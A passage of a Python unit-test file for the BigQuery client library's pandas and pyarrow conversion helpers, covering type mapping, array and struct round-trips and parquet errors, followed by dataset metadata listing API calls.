\"NULLABLE\", pyarrow.types.is_int64),\n (\"INT64\", \"NULLABLE\", pyarrow.types.is_int64),\n (\"FLOAT\", \"NULLABLE\", pyarrow.types.is_float64),\n (\"FLOAT64\", \"NULLABLE\", pyarrow.types.is_float64),\n (\"NUMERIC\", \"NULLABLE\", is_numeric),\n (\"BOOLEAN\", \"NULLABLE\", pyarrow.types.is_boolean),\n (\"BOOL\", \"NULLABLE\", pyarrow.types.is_boolean),\n (\"TIMESTAMP\", \"NULLABLE\", is_timestamp),\n (\"DATE\", \"NULLABLE\", pyarrow.types.is_date32),\n (\"TIME\", \"NULLABLE\", pyarrow.types.is_time64),\n (\"DATETIME\", \"NULLABLE\", is_datetime),\n (\"GEOGRAPHY\", \"NULLABLE\", pyarrow.types.is_string),\n (\"UNKNOWN_TYPE\", \"NULLABLE\", is_none),\n # Use pyarrow.list_(item_type) for repeated (array) fields.\n (\n \"STRING\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"STRING\",\n \"repeated\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"STRING\",\n \"RePeAtEd\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"BYTES\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_binary(type_.value_type),\n ),\n ),\n (\n \"INTEGER\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_int64(type_.value_type),\n ),\n ),\n (\n \"INT64\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_int64(type_.value_type),\n ),\n ),\n (\n \"FLOAT\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_float64(type_.value_type),\n ),\n ),\n (\n \"FLOAT64\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_float64(type_.value_type),\n ),\n ),\n (\n \"NUMERIC\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_numeric(type_.value_type)),\n ),\n (\n \"BOOLEAN\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_boolean(type_.value_type),\n ),\n ),\n (\n \"BOOL\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_boolean(type_.value_type),\n ),\n ),\n (\n \"TIMESTAMP\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_timestamp(type_.value_type)),\n ),\n (\n \"DATE\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_date32(type_.value_type),\n ),\n ),\n (\n \"TIME\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_time64(type_.value_type),\n ),\n ),\n (\n \"DATETIME\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_datetime(type_.value_type)),\n ),\n (\n \"GEOGRAPHY\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\"RECORD\", \"REPEATED\", is_none),\n (\"UNKNOWN_TYPE\", \"REPEATED\", is_none),\n ],\n)\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type(module_under_test, bq_type, bq_mode, is_correct_type):\n field = schema.SchemaField(\"ignored_name\", bq_type, mode=bq_mode)\n actual = module_under_test.bq_to_arrow_data_type(field)\n assert is_correct_type(actual)\n\n\n@pytest.mark.parametrize(\"bq_type\", [\"RECORD\", \"record\", \"STRUCT\", \"struct\"])\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type_w_struct(module_under_test, bq_type):\n fields = (\n schema.SchemaField(\"field01\", \"STRING\"),\n schema.SchemaField(\"field02\", \"BYTES\"),\n schema.SchemaField(\"field03\", \"INTEGER\"),\n schema.SchemaField(\"field04\", \"INT64\"),\n schema.SchemaField(\"field05\", \"FLOAT\"),\n schema.SchemaField(\"field06\", \"FLOAT64\"),\n schema.SchemaField(\"field07\", \"NUMERIC\"),\n schema.SchemaField(\"field08\", \"BOOLEAN\"),\n schema.SchemaField(\"field09\", \"BOOL\"),\n schema.SchemaField(\"field10\", \"TIMESTAMP\"),\n schema.SchemaField(\"field11\", \"DATE\"),\n schema.SchemaField(\"field12\", \"TIME\"),\n schema.SchemaField(\"field13\", \"DATETIME\"),\n schema.SchemaField(\"field14\", \"GEOGRAPHY\"),\n )\n field = schema.SchemaField(\"ignored_name\", bq_type, mode=\"NULLABLE\", fields=fields)\n actual = module_under_test.bq_to_arrow_data_type(field)\n expected = pyarrow.struct(\n (\n pyarrow.field(\"field01\", pyarrow.string()),\n pyarrow.field(\"field02\", pyarrow.binary()),\n pyarrow.field(\"field03\", pyarrow.int64()),\n pyarrow.field(\"field04\", pyarrow.int64()),\n pyarrow.field(\"field05\", pyarrow.float64()),\n pyarrow.field(\"field06\", pyarrow.float64()),\n pyarrow.field(\"field07\", module_under_test.pyarrow_numeric()),\n pyarrow.field(\"field08\", pyarrow.bool_()),\n pyarrow.field(\"field09\", pyarrow.bool_()),\n pyarrow.field(\"field10\", module_under_test.pyarrow_timestamp()),\n pyarrow.field(\"field11\", pyarrow.date32()),\n pyarrow.field(\"field12\", module_under_test.pyarrow_time()),\n pyarrow.field(\"field13\", module_under_test.pyarrow_datetime()),\n pyarrow.field(\"field14\", pyarrow.string()),\n )\n )\n assert pyarrow.types.is_struct(actual)\n assert actual.num_children == len(fields)\n assert actual.equals(expected)\n\n\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type_w_struct_unknown_subfield(module_under_test):\n fields = (\n schema.SchemaField(\"field1\", \"STRING\"),\n schema.SchemaField(\"field2\", \"INTEGER\"),\n # Don't know what to convert UNKNOWN_TYPE to, let type inference work,\n # instead.\n schema.SchemaField(\"field3\", \"UNKNOWN_TYPE\"),\n )\n field = schema.SchemaField(\"ignored_name\", \"RECORD\", mode=\"NULLABLE\", fields=fields)\n actual = module_under_test.bq_to_arrow_data_type(field)\n assert actual is None\n\n\n@pytest.mark.parametrize(\n \"bq_type,rows\",\n [\n (\"STRING\", [\"abc\", None, \"def\", None]),\n (\"BYTES\", [b\"abc\", None, b\"def\", None]),\n (\"INTEGER\", [123, None, 456, None]),\n (\"INT64\", [-9223372036854775808, None, 9223372036854775807, 123]),\n (\"FLOAT\", [1.25, None, 3.5, None]),\n (\n \"NUMERIC\",\n [\n decimal.Decimal(\"-99999999999999999999999999999.999999999\"),\n None,\n decimal.Decimal(\"99999999999999999999999999999.999999999\"),\n decimal.Decimal(\"999.123456789\"),\n ],\n ),\n (\"BOOLEAN\", [True, None, False, None]),\n (\"BOOL\", [False, None, True, None]),\n # TODO: Once https://issues.apache.org/jira/browse/ARROW-5450 is\n # resolved, test with TIMESTAMP column. Conversion from pyarrow\n # TimestampArray to list of Python objects fails with OverflowError:\n # Python int too large to convert to C long.\n #\n # (\n # \"TIMESTAMP\",\n # [\n # datetime.datetime(1, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n # None,\n # datetime.datetime(9999, 12, 31, 23, 59, 59, 999999, tzinfo=pytz.utc),\n # datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n # ],\n # ),\n (\n \"DATE\",\n [\n datetime.date(1, 1, 1),\n None,\n datetime.date(9999, 12, 31),\n datetime.date(1970, 1, 1),\n ],\n ),\n (\n \"TIME\",\n [\n datetime.time(0, 0, 0),\n None,\n datetime.time(23, 59, 59, 999999),\n datetime.time(12, 0, 0),\n ],\n ),\n # TODO: Once https://issues.apache.org/jira/browse/ARROW-5450 is\n # resolved, test with DATETIME column. Conversion from pyarrow\n # TimestampArray to list of Python objects fails with OverflowError:\n # Python int too large to convert to C long.\n #\n # (\n # \"DATETIME\",\n # [\n # datetime.datetime(1, 1, 1, 0, 0, 0),\n # None,\n # datetime.datetime(9999, 12, 31, 23, 59, 59, 999999),\n # datetime.datetime(1970, 1, 1, 0, 0, 0),\n # ],\n # ),\n (\n \"GEOGRAPHY\",\n [\n \"POINT(30 10)\",\n None,\n \"LINESTRING (30 10, 10 30, 40 40)\",\n \"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))\",\n ],\n ),\n ],\n)\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_nullable_scalars(module_under_test, bq_type, rows):\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\"field_name\", bq_type)\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_arrays(module_under_test):\n rows = [[1, 2, 3], [], [4, 5, 6]]\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\"field_name\", \"INTEGER\", mode=\"REPEATED\")\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.parametrize(\"bq_type\", [\"RECORD\", \"record\", \"STRUCT\", \"struct\"])\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_structs(module_under_test, bq_type):\n rows = [\n {\"int_col\": 123, \"string_col\": \"abc\"},\n None,\n {\"int_col\": 456, \"string_col\": \"def\"},\n ]\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\n \"field_name\",\n bq_type,\n fields=(\n schema.SchemaField(\"int_col\", \"INTEGER\"),\n schema.SchemaField(\"string_col\", \"STRING\"),\n ),\n )\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_special_floats(module_under_test):\n bq_field = schema.SchemaField(\"field_name\", \"FLOAT64\")\n rows = [float(\"-inf\"), float(\"nan\"), float(\"inf\"), None]\n series = pandas.Series(rows, dtype=\"object\")\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert len(rows) == len(roundtrip)\n assert roundtrip[0] == float(\"-inf\")\n assert roundtrip[1] != roundtrip[1] # NaN doesn't equal itself.\n assert roundtrip[2] == float(\"inf\")\n assert roundtrip[3] is None\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_arrow_w_required_fields(module_under_test):\n bq_schema = (\n schema.SchemaField(\"field01\", \"STRING\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field02\", \"BYTES\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field03\", \"INTEGER\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field04\", \"INT64\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field05\", \"FLOAT\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field06\", \"FLOAT64\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field07\", \"NUMERIC\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field08\", \"BOOLEAN\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field09\", \"BOOL\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field10\", \"TIMESTAMP\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field11\", \"DATE\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field12\", \"TIME\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field13\", \"DATETIME\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field14\", \"GEOGRAPHY\", mode=\"REQUIRED\"),\n )\n dataframe = pandas.DataFrame(\n {\n \"field01\": [\"hello\", \"world\"],\n \"field02\": [b\"abd\", b\"efg\"],\n \"field03\": [1, 2],\n \"field04\": [3, 4],\n \"field05\": [1.25, 9.75],\n \"field06\": [-1.75, -3.5],\n \"field07\": [decimal.Decimal(\"1.2345\"), decimal.Decimal(\"6.7891\")],\n \"field08\": [True, False],\n \"field09\": [False, True],\n \"field10\": [\n datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n datetime.datetime(2012, 12, 21, 9, 7, 42, tzinfo=pytz.utc),\n ],\n \"field11\": [datetime.date(9999, 12, 31), datetime.date(1970, 1, 1)],\n \"field12\": [datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0)],\n \"field13\": [\n datetime.datetime(1970, 1, 1, 0, 0, 0),\n datetime.datetime(2012, 12, 21, 9, 7, 42),\n ],\n \"field14\": [\n \"POINT(30 10)\",\n \"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))\",\n ],\n }\n )\n\n arrow_table = module_under_test.to_arrow(dataframe, bq_schema)\n arrow_schema = arrow_table.schema\n\n assert len(arrow_schema) == len(bq_schema)\n for arrow_field in arrow_schema:\n assert not arrow_field.nullable\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_arrow_w_unknown_type(module_under_test):\n bq_schema = (\n schema.SchemaField(\"field00\", \"UNKNOWN_TYPE\"),\n schema.SchemaField(\"field01\", \"STRING\"),\n schema.SchemaField(\"field02\", \"BYTES\"),\n schema.SchemaField(\"field03\", \"INTEGER\"),\n )\n dataframe = pandas.DataFrame(\n {\n \"field00\": [\"whoami\", \"whatami\"],\n \"field01\": [\"hello\", \"world\"],\n \"field02\": [b\"abd\", b\"efg\"],\n \"field03\": [1, 2],\n }\n )\n\n with warnings.catch_warnings(record=True) as warned:\n arrow_table = module_under_test.to_arrow(dataframe, bq_schema)\n arrow_schema = arrow_table.schema\n\n assert len(warned) == 1\n warning = warned[0]\n assert \"field00\" in str(warning)\n\n assert len(arrow_schema) == len(bq_schema)\n assert arrow_schema[0].name == \"field00\"\n assert arrow_schema[1].name == \"field01\"\n assert arrow_schema[2].name == \"field02\"\n assert arrow_schema[3].name == \"field03\"\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\ndef test_to_parquet_without_pyarrow(module_under_test, monkeypatch):\n monkeypatch.setattr(module_under_test, \"pyarrow\", None)\n with pytest.raises(ValueError) as exc:\n module_under_test.to_parquet(pandas.DataFrame(), (), None)\n assert \"pyarrow is required\" in str(exc)\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_parquet_w_missing_columns(module_under_test, monkeypatch):\n with pytest.raises(ValueError) as exc:\n module_under_test.to_parquet(\n pandas.DataFrame(), (schema.SchemaField(\"not_found\", \"STRING\"),), None\n )\n assert \"columns in schema must match\" in str(exc)\n", "sub_path": "bigquery/tests/unit/test__pandas_helpers.py", "file_name": "test__pandas_helpers.py", "file_ext": "py", "file_size_in_byte": 19425, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery._pandas_helpers", "line_number": 39, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 67, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 83, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 84, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 85, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 247, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 247, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 127, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 135, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 143, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_binary", "line_number": 151, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_int64", "line_number": 159, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_int64", "line_number": 167, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_float64", "line_number": 175, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_float64", "line_number": 183, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_boolean", "line_number": 196, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 203, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_boolean", "line_number": 204, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_date32", "line_number": 217, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_time64", "line_number": 225, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 238, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 238, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 245, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 245, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 256, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 256, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 257, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 257, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 258, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 258, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 259, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 259, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 260, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 260, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 261, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 261, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 262, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 262, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 263, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 263, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 264, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 264, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 265, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 265, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 266, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 266, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 267, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 267, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 268, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 268, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 269, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 269, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 271, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 271, "usage_type": "name"}, {"api_name": "pyarrow.struct", "line_number": 273, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 275, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 275, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 276, "usage_type": "call"}, {"api_name": "pyarrow.binary", "line_number": 276, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 277, "usage_type": "call"}, {"api_name": "pyarrow.int64", "line_number": 277, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 278, "usage_type": "call"}, {"api_name": "pyarrow.int64", "line_number": 278, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 279, "usage_type": "call"}, {"api_name": "pyarrow.float64", "line_number": 279, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 280, "usage_type": "call"}, {"api_name": "pyarrow.float64", "line_number": 280, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 281, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 282, "usage_type": "call"}, {"api_name": "pyarrow.bool_", "line_number": 282, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 283, "usage_type": "call"}, {"api_name": "pyarrow.bool_", "line_number": 283, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 284, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 285, "usage_type": "call"}, {"api_name": "pyarrow.date32", "line_number": 285, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 286, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 287, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 288, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 288, "usage_type": "call"}, {"api_name": "pyarrow.types.is_struct", "line_number": 291, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 291, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 252, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 253, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 299, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 299, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 300, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 300, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 303, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 303, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 305, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 305, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 296, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 296, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 389, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 390, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 390, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 310, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 310, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 321, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 323, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 324, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 346, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 348, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 349, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 357, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 358, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 386, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 387, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 387, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 400, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 401, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 401, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 396, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 396, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 397, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 416, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 417, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 417, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 421, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 421, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 422, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 422, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 407, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 408, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 408, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 409, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 409, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 433, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 433, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": 